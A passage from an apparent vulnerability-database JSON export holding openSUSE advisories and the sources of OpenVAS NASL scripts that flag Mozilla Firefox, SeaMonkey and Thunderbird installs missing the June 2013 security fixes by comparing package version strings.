attacks\n * MFSA 2013-55/CVE-2013-1693 (bmo#711043) SVG filters can\n lead to information disclosure\n * MFSA 2013-56/CVE-2013-1694 (bmo#848535) PreserveWrapper\n has inconsistent behavior\n * MFSA 2013-57/CVE-2013-1695 (bmo#849791) Sandbox\n restrictions not applied to nested frame elements\n * MFSA 2013-58/CVE-2013-1696 (bmo#761667) X-Frame-Options\n ignored when using server push with multi-part responses\n * MFSA 2013-59/CVE-2013-1697 (bmo#858101) XrayWrappers\n can be bypassed to run user defined methods in a\n privileged context\n * MFSA 2013-60/CVE-2013-1698 (bmo#876044)\n\n", "edition": 1, "modified": "2013-07-11T06:04:11", "published": "2013-07-11T06:04:11", "id": "OPENSUSE-SU-2013:1176-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00015.html", "type": "suse", "title": "update to SeaMonkey 2.19 (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:56:41", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1696", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1695", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1688", "CVE-2013-1686", "CVE-2013-1698", "CVE-2013-1682", "CVE-2013-1683", "CVE-2013-1699", "CVE-2013-1693"], "description": "MozillaFirefox was updated to Firefox 22.0 (bnc#825935)\n\n Following security issues were fixed:\n * MFSA 2013-49/CVE-2013-1682/CVE-2013-1683 Miscellaneous\n memory safety hazards\n * MFSA 2013-50/CVE-2013-1684/CVE-2013-1685/CVE-2013-1686\n Memory corruption found using Address Sanitizer\n * MFSA 2013-51/CVE-2013-1687 (bmo#863933, bmo#866823)\n Privileged content access and execution via XBL\n * MFSA 2013-52/CVE-2013-1688 (bmo#873966) Arbitrary code\n execution within Profiler\n * MFSA 2013-53/CVE-2013-1690 (bmo#857883) Execution of\n unmapped memory through onreadystatechange event\n * MFSA 2013-54/CVE-2013-1692 (bmo#866915) Data in the\n body of XHR HEAD requests leads to CSRF attacks\n * MFSA 2013-55/CVE-2013-1693 (bmo#711043) SVG filters can\n lead to information disclosure\n * MFSA 2013-56/CVE-2013-1694 (bmo#848535) PreserveWrapper\n has inconsistent behavior\n * MFSA 2013-57/CVE-2013-1695 (bmo#849791) Sandbox\n restrictions not applied to nested frame elements\n * MFSA 2013-58/CVE-2013-1696 (bmo#761667) X-Frame-Options\n ignored when using server push with multi-part responses\n * MFSA 2013-59/CVE-2013-1697 (bmo#858101) XrayWrappers\n can be bypassed to run user defined methods in a\n privileged context\n * MFSA 2013-60/CVE-2013-1698 (bmo#876044) getUserMedia\n permission dialog incorrectly displays location\n * MFSA 2013-61/CVE-2013-1699 (bmo#840882) Homograph\n domain spoofing in .com, .net and .name\n\n", "edition": 1, "modified": "2013-07-04T12:04:29", "published": "2013-07-04T12:04:29", "id": "OPENSUSE-SU-2013:1142-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00005.html", "type": "suse", "title": "MozillaFirefox: Update to Firefox 22.0 release (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:11:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1693"], "description": "This host is installed with Mozilla Thunderbird ESR and is prone to multiple\n vulnerabilities.", "modified": "2017-05-11T00:00:00", "published": "2013-06-26T00:00:00", "id": "OPENVAS:903221", "href": "http://plugins.openvas.org/nasl.php?oid=903221", "type": "openvas", "title": "Mozilla Thunderbird ESR Multiple Vulnerabilities - June 13 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_mozilla_thunderbird_esr_mult_vuln_jun13_macosx.nasl 6104 2017-05-11 09:03:48Z teissa $\n#\n# Mozilla Thunderbird ESR Multiple Vulnerabilities - June 13 (Mac OS X)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code,\n obtain potentially sensitive information, gain escalated privileges, bypass\n security restrictions, and perform unauthorized actions. Other attacks may\n also be possible.\n Impact Level: Application\";\n\ntag_affected = \"Thunderbird ESR version 17.x before 17.0.7 on Mac OS X\";\ntag_insight = \"Multiple flaws due to,\n - PreserveWrapper does not handle lack of wrapper.\n - Error in processing of SVG format images with filters to read pixel values.\n - Does not prevent inclusion of body data in XMLHttpRequest HEAD request.\n - Multiple unspecified vulnerabilities in the browser engine.\n - Does not properly handle onreadystatechange events in conjunction with\n page reloading.\n - System Only Wrapper (SOW) and Chrome Object Wrapper (COW), does not\n restrict XBL user-defined functions.\n - Use-after-free vulnerability in 'nsIDocument::GetRootElement' and\n 'mozilla::dom::HTMLMediaElement::LookupMediaElementURITable' functions.\n - XrayWrapper does not properly restrict use of DefaultValue for method calls.\";\ntag_solution = \"Upgrade to Thunderbird ESR 17.0.7 or later,\n http://www.mozilla.org/en-US/thunderbird\";\ntag_summary = \"This host is installed with Mozilla Thunderbird ESR and is prone to multiple\n vulnerabilities.\";\n\nif(description)\n{\n script_id(903221);\n script_version(\"$Revision: 6104 $\");\n script_cve_id( \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\",\n \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1694\",\n \"CVE-2013-1697\", \"CVE-2013-1692\");\n script_bugtraq_id(60766, 60773, 60774, 60777, 60778, 60783, 60787, 60776, 60784,\n 60765);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-11 11:03:48 +0200 (Thu, 11 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-26 18:40:17 +0530 (Wed, 26 Jun 2013)\");\n script_name(\"Mozilla Thunderbird ESR Multiple Vulnerabilities - June 13 (Mac OS X)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/53970\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id/1028702\");\n script_xref(name : \"URL\" , value : \"http://www.mozilla.org/security/announce/2013/mfsa2013-50.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"ThunderBird-ESR/MacOSX/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n# Thunderbird Check\ntbVer = \"\";\ntbVer = get_kb_item(\"ThunderBird-ESR/MacOSX/Version\");\n\nif(tbVer && tbVer =~ \"^17.0\")\n{\n # Grep for Thunderbird version\n if(version_in_range(version:tbVer, test_version:\"17.0\", test_version2:\"17.0.6\"))\n {\n security_message(0);\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-06-27T00:00:00", "id": "OPENVAS:1361412562310881755", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881755", "type": "openvas", "title": "CentOS Update for firefox CESA-2013:0981 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for firefox CESA-2013:0981 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881755\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-27 09:58:18 +0530 (Thu, 27 Jun 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for firefox CESA-2013:0981 centos6\");\n\n script_xref(name:\"CESA\", value:\"2013:0981\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-June/019808.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"firefox on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser. XULRunner provides the XUL\n Runtime environment for Mozilla Firefox.\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause Firefox to crash or,\n potentially, execute arbitrary code with the privileges of the user running\n Firefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685, CVE-2013-1686,\n CVE-2013-1687, CVE-2013-1690)\n\n It was found that Firefox allowed data to be sent in the body of\n XMLHttpRequest (XHR) HEAD requests. In some cases this could allow\n attackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n (CVE-2013-1692)\n\n Timing differences in the way Firefox processed SVG image files could\n allow an attacker to read data across domains, potentially leading to\n information disclosure. (CVE-2013-1693)\n\n Two flaws were found in the way Firefox implemented some of its internal\n structures (called wrappers). An attacker could use these flaws to bypass\n some restrictions placed on them. This could lead to unexpected behavior or\n a potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\n Red Hat would like to thank the Mozilla project for reporting these issues.\n Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\n Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\n Zbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\n For technical details regarding these flaws, refer to the Mozilla\n security advisories for Firefox 17.0.7 ESR. You can find a link to the\n Mozilla advisories in the References section of this erratum.\n\n All Firefox users should upgrade to these updated packages, which contain\n Firefox version 17.0.7 ESR, which corrects these issues. After installing\n the update, Firefox must be restarted for the changes to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~17.0.7~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-26T11:09:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "Check for the Version of MozillaThunderbird", "modified": "2018-01-26T00:00:00", "published": "2013-11-19T00:00:00", "id": "OPENVAS:850495", "href": "http://plugins.openvas.org/nasl.php?oid=850495", "type": "openvas", "title": "SuSE Update for MozillaThunderbird openSUSE-SU-2013:1141-1 (MozillaThunderbird)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2013_1141_1.nasl 8542 2018-01-26 06:57:28Z teissa $\n#\n# SuSE Update for MozillaThunderbird openSUSE-SU-2013:1141-1 (MozillaThunderbird)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(850495);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-19 14:06:01 +0530 (Tue, 19 Nov 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Update for MozillaThunderbird openSUSE-SU-2013:1141-1 (MozillaThunderbird)\");\n\n tag_insight = \"\n MozillaThunderbird was updated to Thunderbird 17.0.7\n (bnc#825935)\n\n Security issues fixed:\n * MFSA 2013-49/CVE-2013-1682 Miscellaneous memory safety\n hazards\n * MFSA 2013-50/CVE-2013-1684/CVE-2013-1685/CVE-2013-1686\n Memory corruption found using Address Sanitizer\n * MFSA 2013-51/CVE-2013-1687 (bmo#863933, bmo#866823)\n Privileged content access and execution via XBL\n * MFSA 2013-53/CVE-2013-1690 (bmo#857883) Execution of\n unmapped memory through onreadystatechange event\n * MFSA 2013-54/CVE-2013-1692 (bmo#866915) Data in the\n body of XHR HEAD requests leads to CSRF attacks\n * MFSA 2013-55/CVE-2013-1693 (bmo#711043) SVG filters can\n lead to information disclosure\n * MFSA 2013-56/CVE-2013-1694 (bmo#848535) PreserveWrapper\n has inconsistent behavior\n * MFSA 2013-59/CVE-2013-1697 (bmo#858101) XrayWrappers\n can be bypassed to run user defined methods in a\n privileged contex\";\n\n tag_affected = \"MozillaThunderbird on openSUSE 12.2\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name: \"openSUSE-SU\", value: \"2013:1141_1\");\n script_tag(name: \"summary\" , value: \"Check for the Version of MozillaThunderbird\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird\", rpm:\"MozillaThunderbird~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird-buildsymbols\", rpm:\"MozillaThunderbird-buildsymbols~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird-debuginfo\", rpm:\"MozillaThunderbird-debuginfo~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird-debugsource\", rpm:\"MozillaThunderbird-debugsource~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird-devel\", rpm:\"MozillaThunderbird-devel~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird-devel-debuginfo\", rpm:\"MozillaThunderbird-devel-debuginfo~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird-translations-common\", rpm:\"MozillaThunderbird-translations-common~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird-translations-other\", rpm:\"MozillaThunderbird-translations-other~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"enigmail\", rpm:\"enigmail~1.5.1+17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"enigmail-debuginfo\", rpm:\"enigmail-debuginfo~1.5.1+17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-06-27T00:00:00", "id": "OPENVAS:1361412562310881756", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881756", "type": "openvas", "title": "CentOS Update for thunderbird CESA-2013:0982 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for thunderbird CESA-2013:0982 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881756\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-27 09:58:50 +0530 (Thu, 27 Jun 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for thunderbird CESA-2013:0982 centos5\");\n\n script_xref(name:\"CESA\", value:\"2013:0982\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-June/019817.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"thunderbird on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail and newsgroup client.\n\n Several flaws were found in the processing of malformed content. Malicious\n content could cause Thunderbird to crash or, potentially, execute arbitrary\n code with the privileges of the user running Thunderbird. (CVE-2013-1682,\n CVE-2013-1684, CVE-2013-1685, CVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\n It was found that Thunderbird allowed data to be sent in the body of\n XMLHttpRequest (XHR) HEAD requests. In some cases this could allow\n attackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n (CVE-2013-1692)\n\n Timing differences in the way Thunderbird processed SVG image files could\n allow an attacker to read data across domains, potentially leading to\n information disclosure. (CVE-2013-1693)\n\n Two flaws were found in the way Thunderbird implemented some of its\n internal structures (called wrappers). An attacker could use these flaws to\n bypass some restrictions placed on them. This could lead to unexpected\n behavior or a potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\n Red Hat would like to thank the Mozilla project for reporting these issues.\n Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\n Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\n Zbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\n Note: All of the above issues cannot be exploited by a specially-crafted\n HTML mail message as JavaScript is disabled by default for mail messages.\n They could be exploited another way in Thunderbird, for example, when\n viewing the full remote content of an RSS feed.\n\n All Thunderbird users should upgrade to this updated package, which\n contains Thunderbird version 17.0.7 ESR, which corrects these issues. After\n installing the update, Thunderbird must be restarted for the changes to\n take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~17.0.7~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-06-27T00:00:00", "id": "OPENVAS:1361412562310881757", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881757", "type": "openvas", "title": "CentOS Update for thunderbird CESA-2013:0982 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for thunderbird CESA-2013:0982 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881757\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-27 09:59:18 +0530 (Thu, 27 Jun 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for thunderbird CESA-2013:0982 centos6\");\n\n script_xref(name:\"CESA\", value:\"2013:0982\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-June/019807.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"thunderbird on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail and newsgroup client.\n\n Several flaws were found in the processing of malformed content. Malicious\n content could cause Thunderbird to crash or, potentially, execute arbitrary\n code with the privileges of the user running Thunderbird. (CVE-2013-1682,\n CVE-2013-1684, CVE-2013-1685, CVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\n It was found that Thunderbird allowed data to be sent in the body of\n XMLHttpRequest (XHR) HEAD requests. In some cases this could allow\n attackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n (CVE-2013-1692)\n\n Timing differences in the way Thunderbird processed SVG image files could\n allow an attacker to read data across domains, potentially leading to\n information disclosure. (CVE-2013-1693)\n\n Two flaws were found in the way Thunderbird implemented some of its\n internal structures (called wrappers). An attacker could use these flaws to\n bypass some restrictions placed on them. This could lead to unexpected\n behavior or a potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\n Red Hat would like to thank the Mozilla project for reporting these issues.\n Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\n Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\n Zbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\n Note: All of the above issues cannot be 